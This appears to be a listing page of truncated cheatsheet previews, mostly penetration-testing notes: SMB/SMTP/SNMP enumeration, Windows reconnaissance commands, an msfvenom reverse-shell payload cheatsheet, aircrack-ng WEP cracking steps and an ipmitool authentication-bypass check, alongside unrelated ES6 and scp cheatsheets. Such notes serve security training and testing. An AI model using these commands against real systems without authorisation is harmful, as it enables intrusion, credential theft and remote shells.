# SMB Enumeration (Server Message Block)
## Scanning for the NetBIOS Service
```ShellSession
root@kali:~# nmap -v -p 139,445 192.168.1.12 -oG /tmp/smp.txt
```
## Scanning NetBIOS using nbtscan
```ShellSession
root@kali:~# nbtscan -r 192.168.1.12
```
## Null Session Enumeration
```ShellSession
root@kali:~# enum4linux -a 192.16...
Score: 0
# SMTP Enumeration (Simple Mail Transfer Protocol)
```ShellSession
root@kali:~# nc -nv 192.168.1.12 25
(UNKNOWN) [192.168.1.12] 25 (smtp) open
220 WIN-3UR24XX66QZ Microsoft ESMTP MAIL Service, Version: 7.0.6001.18000 ready at Thu, 4 Jan 2018 11:48:35 +0200
```
...
Score: 0
# SNMP Enumeration (Simple Network Management Protocol)
## Fix SNMP output values so they are human readable
```ShellSession
apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
```
## Scanning for SNMP
### Using nmap
```ShellSession
root@kali:~# nmap -sU -v --open -p 161 192.168.1.12
...
Score: 0
# Vulnerability Scanning
> Vulnerability scans can generate a great deal of traffic and, in some cases, can even result in denial of service conditions on many network devices, so caution must be exercised before making use of mass vulnerability scanners on a penetration test.
## Vulnerability Scanning with Nmap
- To get all available...
Score: 0
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Install...
Score: 0
## Reverse Shell with Msfvenom - Cheatsheet
### List payloads
{% highlight Shell %}
```Shell
msfvenom -l
```
{% endhighlight %}
Or
{% highlight Shell %}
```Shell
msfvenom --list payloads
```
{% endhighlight %}
### Generate a PHP payload
{% highlight Shell %}
```Shell
msfvenom -p php/meterpreter/reverse_tc...
Score: 0
# es6-cheatsheet
A cheatsheet containing ES2015 [ES6] tips, tricks, best practices and code
snippet examples for your day to day workflow. Contributions are welcome!
## Table of Contents
- [var versus let / const](#var-versus-let--const)
- [Replacing IIFEs with Blocks](#replacing-iifes-with-blocks)
- [Arrow Functions](#arrow-functions)
...
Score: 0
[+] Secure Copy (scp) Cheatsheet
--------------------------------
[>] Copy remote file to local host:
$ scp your_username@192.168.0.10:<remote_file> /some/local/directory
[>] Copy local file to remote host:
$ scp <local_file> your_username@192.168.0.10:/some/remote/directory
[>] Copy local directory to remote di...
Score: 0
WEP attack with aircrack-ng suite.
----------------------------------
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon
aireplay-ng -3 -b <AP MAC> -h <Attacker MAC>...
Score: 0
Verify Various Vulnerabilities
------------------------------
[+] IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931
Tools required:
ipmitool
freeipmi-tools
ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list
# Specifying Cipher Suite Zero
ipmito...
Score: 0